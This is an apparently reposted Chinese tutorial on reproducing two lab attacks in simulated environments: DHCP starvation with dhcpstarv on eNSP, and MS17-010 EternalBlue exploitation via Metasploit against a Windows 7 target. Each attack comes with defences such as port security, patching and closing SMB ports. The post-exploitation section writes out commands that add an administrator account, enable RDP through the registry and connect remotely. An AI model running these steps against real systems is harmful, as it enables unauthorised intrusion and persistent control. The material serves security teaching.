常见的攻击防护

news2024/11/16 4:51:47

只做模拟机器使用,不使用真实机器

目录

一、 DHCP饿死和防护应对措施.................................. 1

1, 实验拓扑:...................................................... 2

2, 实验配置.......................................................... 2

2.1删改设备名字............................................ 2

2.2配置dhcp服务器...................................... 2

3,防护方案:........................................................ 4

二、MS17-010漏洞复现................................................ 6

漏洞的简介.............................................................. 6

实验环境.................................................................. 7

1,扫描主机:................................................................ 7

2, 使用msf的永恒之蓝攻击模块.............................. 8

3,先使用扫描模块3:................................................. 9

4,然后使用攻击模块.................................................... 9

5, 对靶机进行控制:................................................ 10

防范措施1:一旦中病毒首先拔掉网线..... 12

防范措施2:安装杀毒软件,立即给电脑打补丁.................................................................... 13

防范措施3:Windows用户可手动关闭端口和网络共享.................................................... 13

防范措施4:尽快将你所有重要文档资料云端备份............................................................ 13

防范措施5:小心驶得万年船..................... 14

#每日安全简讯#(20231128)

1.研究人员发现新型窃密木马Rude Stealer

http://t.cn/A6WFKy5c

2.数百所学校使用的应用程序泄露了儿童数据

http://t.cn/A6WFKy5q

3.Windows Hello 指纹技术被黑客入侵

http://t.cn/A6WFKy55 ​​​

信息来源:国家计算机病毒应急处理中心

  • DHCP饿死和防护应对措施

以下我将模拟如何进行DHCP饿死攻击的操作:

操作环境:ENSP,KALI操作系统 192.168.169.2/24 ,在系统下创建一张网卡和kali一个网段(kali的地址也是通过网卡自动获取所以ip不准确,要去kali里面ifconfig查看ip地址)

注意:一定要不要用自己wlan网卡。

  1. 实验拓扑:

  1. 实验配置

2.1删改设备名字

<Huawei>sy             //进入系统视图

Enter system view, return user view with Ctrl+Z.

[Huawei]sy DHCPserver            //更改设备名字

[DHCPserver]dhcp enable         //开启DHCP功能


2.2配置dhcp服务器

[DHCPserver]ip pool PC             //配置地址池名字

[DHCPserver-ip-pool-PC]gateway-list 192.168.169.1    //配置地址池网关

[DHCPserver-ip-pool-PC]network 192.168.169.0 mask 255.255.255.0    //配置网段

[DHCPserver-ip-pool-PC]excluded-ip-address 192.168.169.128     //配置排除地址

[DHCPserver-ip-pool-PC] dns-list 114.114.114.114        //配置DNS服务器地址

  1. Kali端配置:

查看kali的ip地址:


4,安装并运行攻击模块:

语法 dhcpstarv   -i  网卡名称(我这里是eth0                      

第一次他会给你一个安装的提示选择y(这里如果安装不了先把kali的网卡配置成可上网的那张在切换)

运行:

5,返回ensp查看DHCP服务器:

你会发现此时你的地址池可用已经空了

先重置IP pool                                              

reset ip pool name PC all 在用户视图下敲                

3,防护方案:

  1. 给PC绑定ip地址(ip地址和MAC地址进行绑定),进入DHCPserver

查看pc端的MAC地址

进入地址池配置                                         

static-bind ip-a ddress 192.168.169.250 mac-address 5489-9836-63F1

没有静态配置之前的:

对比分配之后的:

在kali进行攻击之后:

但此时你pc已经最开始由静态获取了,但是这种的话,比较死板,如果有很多台pc要配置很多句static

  1. 加上端口安全的配置在交换机上面。

#

interface GigabitEthernet0/0/1

 port-security enable

port-security max-mac-num  1 //最大可以学习的MAC1

 port-security protect-action shutdown    //如果超过1则物理关掉这个接口

#

在连接终端的口上配置端口安全:

效果:

二、MS17-010漏洞复现

漏洞的简介

  1. 永恒之蓝介绍:
    MS17-010(永恒之蓝漏洞),永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.什么是SMB协议?

        SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.SMB工作原理是什么?

     (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。

     (2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。

      (3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。

      (4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。

实验环境

复现环境

攻击端Kali (192.168.108.128),靶机win7(192.168.108.212)

实验条件:采用nat模式,不能使用桥接网卡!Win7的防火墙是关闭的!

复现过程:

1,扫描主机

Namp 192.168.108.0/24    //进入kali,使用嗅探工具nmap探测本网段存活的主机数。

找到靶机的ip地址,并且查看它的445端口是不是开放的,而永恒之蓝使用的就是445端口的smb服务,操作系统溢出漏洞。

  1. 使用msf的永恒之蓝攻击模块

打开msf:msfconsole

搜索ms17-010漏洞的工具:search ms17-010

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,      

exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块  
一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

结果显示0,1,4是exploit漏洞利用模块 2,3Auxiliary是辅助模块

3,先使用扫描模块

use auxiliary/scanner/smb/smb_ms17_010

使用show options 可以查看改模块可配置的内容

设置目标ip地址:

set rhosts 192.168.108.212                                               

然后执行run

出现 Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)

则说明该系统存在ms17-010系统漏洞,并且这是一个windows7x64的系统

4,然后使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue                             

设置攻击目标ip地址:192.168.108.212

可以使用show options查看设置选项

设置攻击目标ip:

set rhosts 192.168.108.212                                            

执行run或者expolit

看到已经拿到了靶机的shell

  1. 对靶机进行控制:

新创建一个用户:net user lwh 123456 /add                  

查看用户信息:net user                                    

看到添加成功了

将用户lwh添加到管理员组:net localgroup administrators lwh /add        

效果:

开启远程桌面功能:

这里首先查看3389端口状态:netstat -ano                             

默认他可能没有开

输入下面命令开启3389端口:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f              

                                    

效果:

3389端口开启。

远程桌面连接靶机:

另开一个命令行:

执行:rdesktop 192.168.102.212:3389                                 

效果输入账户密码登录成功:

┌──(rootkali)-[/home/kali]                                          

└─# rdesktop 192.168.108.212:3389                                     

以上这个简单实验只是告诉大家这个漏洞很危险,真正的攻击能做的事情远不止这些。

防范措施1:一旦中病毒首先拔掉网线

    首先黑客是通过网络来对你实施攻击,所以只要断网就能物理进行一个隔离。

网络安全专家郑文彬向重案组37号解释,此方案确实可行。因为非专业人士,个人无法判断电脑是否开放445等端口,可先拔开网线,阻碍病毒入侵,然后安装补丁,再将文件进行备份后,最后重新联网。但最关键是尽快将电脑系统升级或使用光盘安装补丁,修复系统漏洞。

防范措施2:安装杀毒软件,立即给电脑打补丁

      在Windows电脑上安装运行杀毒软件扫描,同时启用Windows Update。针对“永恒之蓝”勒索病毒,微软发布了专门的修复补丁 “MS17-010”, 用以修复被 “ Eternal Blue” 攻击的系统漏洞,用户可以自行下载对应的操作系统版本的补丁进行安装,记得把补丁下载回本地,重要资料所在电脑采用断网打补丁形式。

防范措施3:Windows用户可手动关闭端口和网络共享

      默认状态下,Windows 的 135、139、445 端口处于开放状态,135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码,使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。 WannaCry 正是通过这些端口来进行大规模传播的,因此用户也可以选择手动来关闭以上端口以及关闭网络共享。方法如下:

1.关闭135端口

  • 运行 输入“dcomcnfg”,打开组件服务对话框;
  • 鼠标双击计算机,右键单击我的电脑,选择属性
  • 在出现的我的电脑属性对话框默认属性选项卡中,去掉在此计算机上启用分布式 COM”前的勾;
  • 选择默认协议选项卡,选中面向连接的TCP/IP”,单击删除按钮

2.关闭 135、137、138 端口

在网络邻居上点右键选属性,在新建好的连接上点本地连接,选属性再选择网络选项卡,去掉“Microsoft 网络的文件和打印机共享 “Microsoft 网络客户端的复选框。这样就关闭了共享端 135 137 还有 138端口

3.关闭 139 端口

139 端口是 NetBIOS Session 端口,用来文件和打印共享。关闭 139 的方法是在网络和共享中心本地连接中选取“Internet协议 (TCP/IP)”属性,进入高级”TCP/IP 设置,“WINS” 选项卡设置里面有一项禁用 TCP/IP NETBIOS ”,打勾就可关闭 139 端口。

4.关闭 445 端口

开始→运行输入 “regedit”打开注册表编辑器,确定后定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters,新建名为“SMBDeviceEnabled”的DWORD值,并将其设置为 0,则可关闭 445 端口。

防范措施4:尽快将你所有重要文档资料云端备份

      养成定期的文档备份习惯是非常重要的事情。在你的电脑未感染前,请将电脑中的所有重要文档进行云端备份。重要Word、PDF等小文件但需要高频使用的,比如你的论文、科研报告、研究资料、工作资料等,可通过WPS或者百度云盘进行云端备份,方便你随时在PC端或移动端查看和编辑。

防范措施5:小心驶得万年船

1.加强自身防护

首先及时更新操作系统漏洞补丁、程序软件、杀毒软件病毒库。启用并打开“Windows防火墙”,进入“高级设置”,在入站规则里禁用“文件和打印机共享”相关规则。

2.对于不明邮件和下载的文件先杀毒扫描后使用。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1277127.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Web网页安全策略的研究及其实现方案

摘 要 越来越多的人使用电脑来接触互联网&#xff0c;事实上&#xff0c;使用Web技术的实现基于网络的不断完善和发展的交流网站&#xff0c;人们可以利用计算机网络技术&#xff0c;方便得到想要的任何信息。计算机网络的发展&#xff0c;也促进了相关产业的发展&#xff0c;…

C++11【下】

欢迎来到Cefler的博客&#x1f601; &#x1f54c;博客主页&#xff1a;那个传说中的man的主页 &#x1f3e0;个人专栏&#xff1a;题目解析 &#x1f30e;推荐文章&#xff1a;题目大解析&#xff08;3&#xff09; 目录 &#x1f449;&#x1f3fb; 新的类功能类成员变量初始…

【pytorch】从yolo的make_grid理解torch.meshgrid、torch.stack

文章目录 简述1、torch.meshgrid 创建行列坐标2、torch.stack 结合行列坐标3、通过view函数扩展维度 简述 yolo检测 make_grid创建网格代码如下&#xff0c;那么什么是torch.meshgrid? def _make_grid(nx20, ny20):yv, xv torch.meshgrid([torch.arange(ny), torch.arange(…

三 STM32F4使用Sys_Tick 实现微秒定时器和延时

更多细节参考这篇 1. 什么是时钟以及作用 1.1 什么是时钟 时钟是由电路产生的周期性的脉冲信号&#xff0c;相当于单片机的心脏 1.2 时钟对于STM32的作用 指令同步&#xff1a;cpu和内核外设使用时钟信号来进行指令同步数据传输控制&#xff1a; 时钟信号控制数据在内部总…

CSS新手入门笔记整理:CSS图片样式

图片大小 语法 width:像素值; height:像素值; 图片边框&#xff1a;border 语法 边框&#xff1a;宽度值 样式值 颜色值&#xff1b; border:1px solid red; 图片对齐 水平对齐&#xff1a;text-align 语法 text-align:取值; 属性值 说明 left 左对齐(默认值) cent…

【Java Web学习笔记】 1 - HTML入门

项目代码 https://github.com/yinhai1114/JavaWeb_LearningCode/tree/main/html 零、网页的组成 HTML是网页内容的载体。内容就是网页制作者放在页面上想要让用户浏览的信息&#xff0c;可以包含文字、图片视频等。 CSS样式是表现。就像网页的外衣。比如&#xff0c;标题字体、…

go学习之goroutine和channel

文章目录 一、goroutine(协程)1.goroutine入门2.goroutine基本介绍-1.进程和线程说明-2.程序、进程和线程的关系示意图-3.Go协程和Go主线程 3.案例说明4.小结5.MPG模式基本介绍6.设置Golang运行的CPU数7.协程并发&#xff08;并行&#xff09;资源竞争的问题8.全局互斥锁解决资…

【渗透】记录阿里云CentOS一次ddos攻击

文章目录 发现防御 发现 防御 流量清洗 使用高防

acwing算法基础之动态规划--数位统计DP、状态压缩DP、树形DP和记忆化搜索

目录 1 基础知识2 模板3 工程化 1 基础知识 暂无。。。 2 模板 暂无。。。 3 工程化 题目1&#xff1a;求a~b中数字0、数字1、…、数字9出现的次数。 思路&#xff1a;先计算1~a中每位数字出现的次数&#xff0c;然后计算1~b-1中每位数字出现的次数&#xff0c;两个相减即…

YOLOv8优化策略:SENetV2,squeeze和excitation全面升级,效果优于SENet | 2023年11月最新成果

🚀🚀🚀本文改进: SENetV2,squeeze和excitation全面升级,作为注意力机制引入到YOLOv8,放入不同网络位置实现涨点 🚀🚀🚀YOLOv8改进专栏:http://t.csdnimg.cn/hGhVK 学姐带你学习YOLOv8,从入门到创新,轻轻松松搞定科研; 1.SENetV2 论文:https://arxiv.org/…

java:springboot3集成swagger(springdoc-openapi-starter-webmvc-ui)

背景 网上集成 swagger 很多都是 Springfox 那个版本的&#xff0c;但是那个版本已经不更新了&#xff0c;springboot3 集成会报错 Typejavax.servlet.http.HttpServletRequest not present&#xff0c;我尝试了很多才知道现在用 Springdoc 了&#xff0c;今天我们来入门一下 …

2023-12-02 LeetCode每日一题(拼车)

2023-12-02每日一题 一、题目编号 1094. 拼车二、题目链接 点击跳转到题目位置 三、题目描述 车上最初有 capacity 个空座位。车 只能 向一个方向行驶&#xff08;也就是说&#xff0c;不允许掉头或改变方向&#xff09; 给定整数 capacity 和一个数组 trips , trip[i] …

国际语音群呼系统

随着海外电话营销的发展&#xff0c;越来越多的出海企业通过国际语音群呼系统打开出海营销之路。企业出海营销运营&#xff0c;选择一个安全、高效、便捷的国际语音群呼系统非常重要。 一、什么是国际语音群呼系统&#xff1f; 国际语音群呼是指通过语音的方式批量向海外用户传…

一进三出宿舍限电模块的改造升级

一进三出宿舍限电模块改造升级石家庄光大远通电气有限公司智能模块功能特点&#xff1a; 电能控制功能&#xff1a;可实施剩余电量管理&#xff0c;电量用完时将自动断电&#xff1b; 剩余电量可视报警提示功能&#xff1a;剩余电量可视&#xff0c;并当电量剩余5度时&#xff…

cpu版本的torch可以用清华镜像源安装

一、来到pytroch官网找到如下代码 官方提供的默认的安装cpu版本的torch的命令 pip3 install torch torchvision torchaudio二、使用清华镜像安装 pip3 install torch torchvision torchaudio -i https://pypi.tuna.tsinghua.edu.cn/simple

力扣题:字符串的反转-11.24

力扣题-11.24 [力扣刷题攻略] Re&#xff1a;从零开始的力扣刷题生活 力扣题1&#xff1a;151. 翻转字符串里的单词 解题思想&#xff1a;保存字符串中的单词即可 class Solution(object):def reverseWords(self, s):""":type s: str:rtype: str"&quo…

项目实战-编写ssm整合配置文件

1、父工程pom.xml <properties><maven.compiler.source>17</maven.compiler.source><maven.compiler.target>17</maven.compiler.target><project.build.sourceEncoding>UTF-8</project.build.sourceEncoding><spring.version>…

继承 和 多肽(超重点 ! ! !)

[本节目标] 1.继承 2.组合 3.多肽 1.继承 1.1 为什么要继承 Java中使用类对现实世界中实体来进行描述&#xff0c;类经过实例化之后的产物对象&#xff0c;则可以用来表示现实中的实体&#xff0c;但是现实世界错综复杂&#xff0c;事物之间可能会存在一些关联&#xff0…

计算机组成学习-计算机系统概述总结

1、计算机系统概述 日常见到的计算机有显示器、键盘、鼠标、音箱、主机箱等&#xff1b;主机箱中有&#xff1a;主板、CPU、硬盘、内存、显卡、声卡等&#xff1b; 1.1 计算机系统层次结构 1.2 计算机系统的基本组成 包括硬件系统和软件系统两部分。 1.2.1 计算机硬件 计算…

HarmonyOS 开发案例分享:万能卡片也能用来玩游戏

一、前言 作为一名开发爱好者&#xff0c;从大了讲&#xff0c;我学习并进行 HarmonyOS 相关开发是为了能为鸿蒙生态建设尽一份绵薄之力&#xff0c;从小了讲&#xff0c;就是为了自己的兴趣。而万能卡片是一个让我非常感兴趣的东西。 很多时候我跟别人解释什么是万能卡片&…